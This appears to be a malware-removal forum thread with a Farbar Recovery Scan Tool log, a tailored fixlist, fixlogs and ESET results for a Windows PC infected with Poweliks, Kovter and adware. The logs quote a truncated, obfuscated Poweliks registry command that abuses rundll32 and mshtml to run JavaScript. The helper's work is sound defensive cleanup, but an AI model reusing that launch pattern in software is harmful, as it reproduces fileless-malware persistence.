RSNetWorx for DeviceNet 11.00.00 (CPR 9 SR 5) (HKLM-x32\...\{692179FB-984B-465A-BC4F-3875D2D53F32}) (Version: 11.00.00 - Rockwell Automation, Inc.)
RSNetWorx for EtherNet/IP 11.00.00 (CPR 9 SR 5) (HKLM-x32\...\{D92FFA80-FC57-11D6-AFD6-0050BA883E61}) (Version: 11.00.00 - Rockwell Automation, Inc.)
RSView ME 6.10.00.9 (CPR 9 SR 4) (HKLM-x32\...\RSView Studio) (Version:  - )
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version:  - 2K Games, Inc.)
Sid Meier's Civilization: Beyond Earth (HKLM-x32\...\Steam App 65980) (Version:  - Firaxis Games)
Snagit 11 (HKLM-x32\...\{7CA5C4DF-8327-4035-AE2B-CA76336A04FD}) (Version: 11.0.0 - TechSmith Corporation)
Software Updater (HKLM-x32\...\{7ACB9D1D-5B26-4CE4-964A-1EB22461E6F6}) (Version: 4.1.0 - SEIKO EPSON CORPORATION)
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
SonicWALL SSL-VPN NetExtender (HKLM-x32\...\{EF06A6A8-6B81-4A09-8223-789953972FFF}) (Version: 4.0.138 - SonicWALL Inc.)
Spectrum Controls 1734 Analog Module Profiles (x32 Version: 1.11.1.0 - Spectrum Controls, Inc.) Hidden
Spectrum Controls 1756 Analog Module Profiles (x32 Version: 1.09.1.0 - Spectrum Controls, Inc.) Hidden
Spectrum Controls 1756 Specialty Module Profiles (x32 Version: 1.03.1.0 - Spectrum Controls, Inc.) Hidden
Spectrum Controls 1769 Analog Module Profiles (x32 Version: 1.05.1.0 - Spectrum Controls, Inc.) Hidden
Spectrum Controls 1769 Analog Module Profiles (x32 Version: 1.06.1.0 - Spectrum Controls, Inc.) Hidden
Spectrum Controls 1769 Analog Module Profiles (x32 Version: 2.06.1.0 - Spectrum Controls, Inc.) Hidden
SQL Server 2008 R2 Common Files (x32 Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server 2008 R2 Database Engine Services (x32 Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server 2008 R2 Database Engine Shared (x32 Version: 10.50.1600.1 - Microsoft Corporation) Hidden
Sql Server Customer Experience Improvement Program (x32 Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server System CLR Types (HKLM-x32\...\{342D4AD7-EC4C-4EC8-AEA6-E70F5905A490}) (Version: 10.0.1600.22 - Microsoft Corporation)
ST Microelectronics 3 Axis Digital Accelerometer Solution (HKLM-x32\...\{9C24F411-9CA7-4A8A-91F3-F08A4A38EB31}) (Version: 4.10.0039 - ST Microelectronics)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
SugarSync Manager (HKLM-x32\...\SugarSync) (Version: 1.9.97.122348 - SugarSync, Inc.)
TeamViewer 9 (HKLM-x32\...\TeamViewer 9) (Version: 9.0.28223 - TeamViewer)
TheGreenBow IPSec VPN Client (HKLM-x32\...\TheGreenBow IPSec VPN Client) (Version:  - TheGreenBow)
TightVNC (HKLM\...\{D2372F87-7DA2-47F7-A102-AF2181B8EAA2}) (Version: 2.7.10.0 - GlavSoft LLC.)
VIVOTEK Installation Wizard 2 (HKLM-x32\...\InstallationWizard2) (Version:  - )
VMware vSphere Client 5.5 (HKLM-x32\...\{4CFB0494-2E96-4631-8364-538E2AA91324}) (Version: 5.5.0.3165 - VMware, Inc.)
VMware Workstation (HKLM-x32\...\VMware_Workstation) (Version: 10.0.3 - VMware, Inc)
VMware Workstation (Version: 10.0.3 - VMware, Inc.) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)
XCOM: Enemy Unknown (HKLM-x32\...\Steam App 200510) (Version:  - Firaxis Games)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-1491709306-3982533891-1808157286-1002_Classes\CLSID\{3faa4380-a399-11cf-a466-00805fe418f6}\InprocServer32 -> C:\Program Files\Autodesk\DWG TrueView 2013\en-US\dwgviewrficn.dll (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1491709306-3982533891-1808157286-1002_Classes\CLSID\{6A221957-2D85-42A7-8E19-BE33950D1DEB}\localserver32 -> C:\Program Files\Autodesk\DWG TrueView 2013\dwgviewr.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1491709306-3982533891-1808157286-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 20:34 - 2009-06-10 15:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {17E14255-BEE0-48A5-8FC0-B3F002EDE6FA} - System32\Tasks\{18B872B0-A550-C9CD-0FDB-34F22E20273C} => C:\Windows\system32\tlttzup.dll [2014-11-05] ()
Task: {58257D22-D752-4164-B95E-42BE3B84A2A7} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-04-29] (Google Inc.)
Task: {58FB209C-C48D-4E10-BBA2-B52D45FED87C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {62C43E74-6A19-4CD6-8DAA-595EA501083E} - System32\Tasks\EPSON XP-610 Series Invitation {764B7596-3AFD-44A0-8816-6BF3CD79EC16} => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLQE.EXE [2013-02-27] (SEIKO EPSON CORPORATION)
Task: {74BFA1BC-CE85-4558-80B7-6B7C421E0AB5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-04-29] (Google Inc.)
Task: {DFC92F84-D7BA-4915-9A9B-0115969DDE60} - System32\Tasks\EPSON XP-610 Series Update {764B7596-3AFD-44A0-8816-6BF3CD79EC16} => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLQE.EXE [2013-02-27] (SEIKO EPSON CORPORATION)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\EPSON XP-610 Series Invitation {764B7596-3AFD-44A0-8816-6BF3CD79EC16}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLQE.EXE
Task: C:\Windows\Tasks\EPSON XP-610 Series Update {764B7596-3AFD-44A0-8816-6BF3CD79EC16}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLQE.EXE
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-07-16 11:46 - 2013-10-23 13:24 - 00087600 _____ () C:\Windows\System32\cpwmon64.dll
2014-11-05 08:13 - 2014-11-05 08:13 - 00081202 _____ () C:\Windows\Temp\jffi2349937226329698442.tmp
2014-04-15 09:24 - 2009-01-09 16:21 - 00651264 _____ () C:\Program Files (x86)\PST\Binaries\RACurrTray.exe
2010-11-17 09:35 - 2010-11-17 09:35 - 00514544 _____ () C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe
2014-06-12 16:44 - 2014-06-12 16:44 - 14407384 _____ () C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
2014-10-31 13:55 - 2014-10-31 13:55 - 00031232 _____ () C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YWPack\cygmapMod54.dll
2009-06-11 07:15 - 2009-06-11 07:15 - 00041760 _____ () C:\Program Files (x86)\Common Files\Rockwell\FTDiagnosticsODBCENU.dll
2013-10-09 23:41 - 2013-10-09 23:41 - 00069632 _____ () C:\Program Files (x86)\SugarSync\librsync.dll
2010-11-24 21:44 - 2010-11-24 21:44 - 00375280 _____ () c:\program files (x86)\common files\roxio shared\dllshared\SQLite352.dll
2011-10-18 14:05 - 2011-10-18 14:05 - 00053248 _____ () C:\Program Files (x86)\Rockwell Automation\UsbCipDriver\UsbCipHelper\rausbciplib.dll
2011-11-11 16:26 - 2011-11-11 16:26 - 00015720 _____ () C:\Program Files (x86)\Common Files\Rockwell\RnaStorageSupportServerPS.dll
2014-06-12 17:22 - 2014-06-12 17:22 - 01261272 _____ () C:\Program Files (x86)\VMware\VMware Workstation\libxml2.dll
2014-04-30 14:03 - 2013-11-13 13:23 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:137
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:187
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:266
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:288
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:92
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-1491709306-3982533891-1808157286-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1491709306-3982533891-1808157286-1010 - Limited - Enabled)
Guest (S-1-5-21-1491709306-3982533891-1808157286-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1491709306-3982533891-1808157286-1004 - Limited - Enabled)
Mark (S-1-5-21-1491709306-3982533891-1808157286-1002 - Administrator - Enabled) => C:\Users\Mark
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/05/2014 08:14:30 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 08:09:21 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 07:23:05 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 04:38:28 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 08:21:13 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/03/2014 02:52:05 PM) (Source: VSS) (EventID: 22) (User: )
Description: Volume Shadow Copy Service error: A critical component required by the Volume Shadow Copy service is not registered.
This might happened if an error occurred during Windows setup or during installation of a Shadow Copy provider.
The error returned from CoCreateInstance on class with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and Name Coordinator is [0x80040154, Class not registered
].
 
Error: (11/03/2014 02:51:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DellSystemDetect.exe, version: 5.7.0.6, time stamp: 0x534e6f8a
Faulting module name: KERNELBASE.dll, version: 6.1.7601.18409, time stamp: 0x5315a05a
Exception code: 0xc06d007e
Fault offset: 0x000000000000940d
Faulting process id: 0x55c
Faulting application start time: 0xDellSystemDetect.exe0
Faulting application path: DellSystemDetect.exe1
Faulting module path: DellSystemDetect.exe2
Report Id: DellSystemDetect.exe3
 
Error: (11/03/2014 02:50:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mbamservice.exe, version: 3.0.8.0, time stamp: 0x53f64d6c
Faulting module name: mbamservice.exe, version: 3.0.8.0, time stamp: 0x53f64d6c
Exception code: 0x40000015
Fault offset: 0x0008f746
Faulting process id: 0xae8
Faulting application start time: 0xmbamservice.exe0
Faulting application path: mbamservice.exe1
Faulting module path: mbamservice.exe2
Report Id: mbamservice.exe3
 
Error: (11/03/2014 02:50:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: NEGui.exe, version: 4.0.138.1, time stamp: 0x4c212f68
Faulting module name: NEGui.exe, version: 4.0.138.1, time stamp: 0x4c212f68
Exception code: 0xc0000005
Fault offset: 0x0000e94d
Faulting process id: 0xd04
Faulting application start time: 0xNEGui.exe0
Faulting application path: NEGui.exe1
Faulting module path: NEGui.exe2
Report Id: NEGui.exe3
 
Error: (11/03/2014 02:50:06 PM) (Source: Desktop Window Manager) (EventID: 9020) (User: )
Description: The Desktop Window Manager has encountered a fatal error (0x80070008)
 
 
System errors:
=============
Error: (11/05/2014 02:17:07 PM) (Source: Server) (EventID: 2505) (User: )
Description: The server could not bind to the transport \Device\NetBT_Tcpip_{38797CE2-CD2A-4B8C-8482-EC19CD6FA29D} because another computer on the network has the same name.  The server could not start.
 
Error: (11/05/2014 10:18:49 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.
 
Error: (11/05/2014 10:18:49 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.
 
Error: (11/05/2014 09:19:44 AM) (Source: NetBT) (EventID: 4319) (User: )
Description: A duplicate name has been detected on the TCP network.  The IP address of
the computer that sent the message is in the data. Use nbtstat -n in a
command window to see which name is in the Conflict state.
 
Error: (11/05/2014 08:14:37 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (11/04/2014 10:34:59 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error: 
%%-2140995069
 
Error: (11/04/2014 10:34:59 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error: 
%%-2140995069
 
Error: (11/04/2014 10:34:59 PM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: 0x80630203
 
Error: (11/04/2014 10:34:34 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
 
Error: (11/04/2014 08:11:53 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error: 
%%-2140995069
 
 
Microsoft Office Sessions:
=========================
Error: (11/05/2014 08:14:30 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 08:09:21 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 07:23:05 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 04:38:28 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 08:21:13 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/03/2014 02:52:05 PM) (Source: VSS) (EventID: 22) (User: )
Description: {e579ab5f-1cc4-44b4-bed9-de0991ff0623}Coordinator0x80040154, Class not registered
 
Error: (11/03/2014 02:51:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: DellSystemDetect.exe5.7.0.6534e6f8aKERNELBASE.dll6.1.7601.184095315a05ac06d007e000000000000940d55c01cff7a79dce8fdbC:\Users\Mark\AppData\Local\Apps\2.0\50CAB00K.WMW\2TWBM7VC.CKO\dell..tion_0f612f649c4a10af_0005.0007_59de4fd2458fcaec\DellSystemDetect.exeC:\Windows\system32\KERNELBASE.dll39ea321c-639b-11e4-88ff-005056c00008
 
Error: (11/03/2014 02:50:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: mbamservice.exe3.0.8.053f64d6cmbamservice.exe3.0.8.053f64d6c400000150008f746ae801cff7a74f8b205dC:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exeC:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe08aa81ef-639b-11e4-88ff-005056c00008
 
Error: (11/03/2014 02:50:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: NEGui.exe4.0.138.14c212f68NEGui.exe4.0.138.14c212f68c00000050000e94dd0401cff7a7988808e7C:\Program Files (x86)\SonicWALL\SSL-VPN\NetExtender\NEGui.exeC:\Program Files (x86)\SonicWALL\SSL-VPN\NetExtender\NEGui.exe0822d37f-639b-11e4-88ff-005056c00008
 
Error: (11/03/2014 02:50:06 PM) (Source: Desktop Window Manager) (EventID: 9020) (User: )
Description: 0x80070008
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core i7-4800MQ CPU @ 2.70GHz
Percentage of memory in use: 37%
Total physical RAM: 16289.41 MB
Available physical RAM: 10218.46 MB
Total Pagefile: 32576.99 MB
Available Pagefile: 26656.87 MB
Total Virtual: 8192 MB
Available Virtual: 8191.85 MB
 
==================== Drives ================================
 
Drive c: (OSDisk) (Fixed) (Total:452.09 GB) (Free:196.66 GB) NTFS
Drive y: () (Network) (Total:913.35 GB) (Free:342.69 GB) 
Drive z: () (Network) (Total:913.35 GB) (Free:342.69 GB) 
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 09FF218E)
Partition 1: (Not Active) - (Size=452.1 GB) - (Type=07 NTFS)
Partition 2: (Active) - (Size=13.7 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================

Step 1

Please uninstall this program: FromDocToPDF Internet Explorer Toolbar

Step 2

Download attached fixlist.txt file and save it to the Desktop.

NOTE: It's important that both files, FRST/FRST64 and fixlist.txt, are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST/FRST64 and press the Fix button just once and wait.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished, FRST will generate a log on the Desktop (Fixlog.txt). Please post it in your reply.

fixlist.txt


I was unable to uninstall the FromDocToPDF Internet Explorer Toolbar.  I attached a jpg of the error I received.

 

 

Fixlog.txt

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 09-11-2014 01

Ran by Mark at 2014-11-10 08:43:10 Run:1

Running from C:\Users\Mark\Desktop

Loaded Profile: Mark (Available profiles: Mark)

Boot Mode: Normal

==============================================

 

Content of fixlist:

*****************

Start

CustomCLSID: HKU\S-1-5-21-1491709306-3982533891-1808157286-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [383d10] => C:\383d109\383d109.exe

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [383d109] => C:\Users\Mark\AppData\Roaming\383d109.exe

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [YnPack] => C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YnPack\usejdwp.exe <===== ATTENTION

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [YWPack] => regsvr32.exe C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YWPack\cygmapMod54.dll <===== ATTENTION

C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YWPack

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

URLSearchHook: HKCU - (No Name) - {4c60e5ab-5c68-4c59-abaa-885010b24b32} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65SrcAs.dll No File

C:\Program Files (x86)\FromDocToPDF_65

Toolbar: HKLM-x32 - FromDocToPDF - {c66a678d-5e6c-4af9-8f57-c6192f42cf74} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll No File

2014-11-05 08:39 - 2014-11-05 08:39 - 00000028 _____ () C:\Windows\SysWOW64\u

2014-10-28 09:17 - 2014-08-15 13:34 - 00000000 ____D () C:\Users\Mark\AppData\Roaming\BitTorrent

2014-11-05 08:38 - 2014-11-05 08:38 - 00071168 _____ () C:\Windows\system32\tlttzup.dll

2014-11-05 08:38 - 2014-11-05 08:38 - 00003860 _____ () C:\Windows\System32\Tasks\{18B872B0-A550-C9CD-0FDB-34F22E20273C}

2014-11-05 08:38 - 2014-11-05 08:38 - 00000000 _____ () C:\Windows\system32\yvgmc.dll

C:\Users\Mark\AppData\Local\Temp\stuprt.exe

End

*****************

 

"HKU\S-1-5-21-1491709306-3982533891-1808157286-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key Deleted Successfully.

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\Software\Microsoft\Windows\CurrentVersion\Run\\383d10 => value deleted successfully.

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\Software\Microsoft\Windows\CurrentVersion\Run\\383d109 => value deleted successfully.

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\Software\Microsoft\Windows\CurrentVersion\Run\\YnPack => value deleted successfully.

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\Software\Microsoft\Windows\CurrentVersion\Run\\YWPack => Value not found.

"C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YWPack" => File/Directory not found.

"HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key not found.

"HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.

HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks\\{4c60e5ab-5c68-4c59-abaa-885010b24b32} => value deleted successfully.

"HKCR\Wow6432Node\CLSID\{4c60e5ab-5c68-4c59-abaa-885010b24b32}" => Key deleted successfully.

"C:\Program Files (x86)\FromDocToPDF_65" => File/Directory not found.

HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{c66a678d-5e6c-4af9-8f57-c6192f42cf74} => value deleted successfully.

"HKCR\Wow6432Node\CLSID\{c66a678d-5e6c-4af9-8f57-c6192f42cf74}" => Key deleted successfully.

C:\Windows\SysWOW64\u => Moved successfully.

C:\Users\Mark\AppData\Roaming\BitTorrent => Moved successfully.

"C:\Windows\system32\tlttzup.dll" => File/Directory not found.

C:\Windows\System32\Tasks\{18B872B0-A550-C9CD-0FDB-34F22E20273C} => Moved successfully.

C:\Windows\system32\yvgmc.dll => Moved successfully.

C:\Users\Mark\AppData\Local\Temp\stuprt.exe => Moved successfully.

 

==== End of Fixlog ====


Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 09-11-2014 01

Ran by Mark at 2014-11-11 20:30:50 Run:2

Running from C:\Users\Mark\Desktop

Loaded Profile: Mark (Available profiles: Mark)

Boot Mode: Normal

==============================================

 

Content of fixlist:

*****************

Start

C:\Program Files (x86)\FromDocToPDF_65

End

*****************

 

"C:\Program Files (x86)\FromDocToPDF_65" => File/Directory not found.

 

==== End of Fixlog ====


Looks like there is no such folder. Next step.

Please scan your machine with ESET OnlineScan

  • Hold down Control and click on the following link to open ESET OnlineScan in a new window.

    ESET OnlineScan

  • Click the esetonlinebtn.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer.

      Save it to your Desktop.

    • Double click on the esetsmartinstaller_enu.exe icon on your Desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under Scan Settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.

C:\FRST\Quarantine\C\Users\Mark\AppData\Local\Temp\stuprt.exe.xBAD      Win32/Kovter.A trojan      cleaned by deleting - quarantined

C:\Users\Mark\Downloads\minecraft mods\Setup.exe      a variant of Win32/AdWare.iBryte.BG application cleaned by deleting - quarantined


Glad I could help! :)

Step 1

  • Download OTL to your desktop and run it.
  • Click on the CleanUp button.
  • You will be asked to reboot the machine to finish the Cleanup process. Choose Yes.
Step 2

Please uninstall ESET Online Scanner.

Step 3

Malware prevention tips:

https://forums.malwarebytes.org/index.php?/topic/81386-so-how-did-i-get-infected-in-the-first-place/

Safe surfing! :)


  • 3 months later...
  • Root Admin

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance, please start your own topic in a new thread. Thanks!
